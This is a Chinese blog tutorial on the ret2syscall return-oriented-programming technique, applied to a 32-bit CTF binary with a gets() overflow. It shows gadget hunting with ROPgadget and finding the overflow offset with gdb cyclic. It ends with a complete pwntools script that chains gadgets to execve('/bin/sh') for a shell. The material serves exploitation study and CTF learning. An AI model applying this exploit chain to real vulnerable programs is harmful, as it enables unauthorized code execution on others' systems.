pwn基本ROP——ret2syscall

已于 2022-04-26 17:03:21 修改
阅读量2.8k 收藏 12
点赞数 4
分类专栏: pwn 文章标签: 网络安全 系统安全
于 2022-04-25 23:35:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/turtlesd/article/details/124415272
版权

ret2syscall

环境

ret2syscall

原理

系统调用

系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。
操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。

应用程序调用系统调用的过程是:
1、把系统调用的编号存入 EAX;
1、把函数参数存入其它通用寄存器;
3、触发 0x80 号中断(int 0x80)。

利用方式

gadgets :以 ret 结尾的指令序列
利用程序中的gadgets控制寄存器的读写来进行系统调用,实现execve("/bin/sh",NULL,NULL)系统调用,获取最高权限。

漏洞分析

使用checksec指令查看程序保护措施

checksec rop

在这里插入图片描述
可见该程序为32位,仅开启了NX堆栈不可执行,故不可以直接向堆栈中注入shellcode获取权限。

使用IDA32位进行调试

反汇编后可看到main函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("This time, no system() and NO SHELLCODE!!!");
  puts("What do you plan to do?");
  gets(&v4);
  return 0;
}

可以看到主函数中存在gets危险函数,可以利用gets修改main函数的返回值返回到我们所需的gadgets,从而进行想要执行的系统调用,在这里我们可以进行execve("/bin/sh",NULL,NULL)系统调用

通过在IDA中shift + F12查看字符串,我们可以看到存在/bin/sh字符串,地址为0x080BE408
在这里插入图片描述
我们可以直接利用这个字符串作为execve的第一个参数进行调用。

由上述原理可知,这里我们需要eax寄存器来存储系统调用号,利用其它寄存器来存储参数,再通过0x80触发中断

此处我们系统调用函数为execve,对应的系统调用号为0xb,故应给eax赋值0xb
execve函数的三个参数则分别对应着ebxecxedx三个寄存器
ebx——0x080BE408/bin/sh字符串地址
ecx——0
edx——0

如何给这些寄存器赋值呢?

汇编语言中有一条指令是pop xxx,可将栈顶数据弹出并存入xxx中,这个xxx可以为寄存器
我们就可以使用gets函数修改栈中数据,然后触发pop指令将这些数据存入栈中
那么如何指定pop指令的操作对象呢?
这时我们需要利用一个小工具:ropgadgets,这个工具可以帮助我们获取需要的gadgets

比如这道题我们需要将0xb存入eax中,我们就可以输入以下指令

ROPgadget --binary rop  --only 'pop|ret' | grep 'eax'

这条指令可以帮助我们找到rop程序中eax寄存器的pop|ret指令的地址
在这里插入图片描述
可以看到,包含popeaxret指令的所有gadgets都被列出,这里我们只需要第二个即可

然后我们再找’ebx’的相关gadgets

ROPgadget --binary rop  --only 'pop|ret' | grep 'ebx'

在这里插入图片描述
发现这么多相关的gadgets均被列出,这里我们可以发现倒数第六行将ebxecxedx都用到了,我们就可以直接利用这一条gadgets来给这些寄存器赋值

接下来再利用gdb获取return偏移量

gdb rop
cyclic 200 
r
cyclic -l 0x62616164

在这里插入图片描述
随机产生200个字母
在这里插入图片描述
可以看到在0x62616164报错,说明这里就是return在栈中的位置,被这四个字母覆盖
在这里插入图片描述
通过cyclic -l命令查找刚刚随机产生的字符串中这四个连续字母的位置可以确定偏移量为112

payload

from pwn import *
 
io = process('./rop')

pop_eax_ret = p32(0x080bb196)
pop_edx_ecx_ebx_ret = p32(0x0806eb90)
int_0x80 = p32(0x08049421)

payload = bytes('a' * 112,'utf-8') + pop_eax_ret + p32(0xb)  + pop_edx_ecx_ebx_ret + p32(0) + p32(0) + p32(0x080BE408)  + int_0x80

io.sendline(payload)

io.interactive()
地址栈中内容
ebp~ebp-0x64a
main函数return地址pop_eax_ret地址
pop_eax_ret参数0xb
pop_eax_ret return地址pop_edx_ecx_ebx_ret地址
参数30
参数20
参数1/bin/sh字符串地址
pop_edx…_ret返回地址0x80截断

其中栈中参数都是pop的参数,用来弹到指定的寄存器中

见过自讼
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn ret2syscall
young‘s blog
02-11 959
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
PWN】07.ret2syscall
weixin_52553215的博客
11-12 2328
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
ret2syscall简单总结
最新发布
ULGANOY的博客
07-05 692
主要是自己的简单的学习总结。
ret2syscall(pwn第二课)
s5555555___的博客
02-20 1270
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
ret2syscall
Maxmalloc的博客
02-08 514
xx@ubuntu:~/Documents/rop$ file pwn pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fca490f050dc...
ROP链:ret2syscall
小龙在线
09-13 421
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3399
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1582
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
pwn ret2libc原理
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值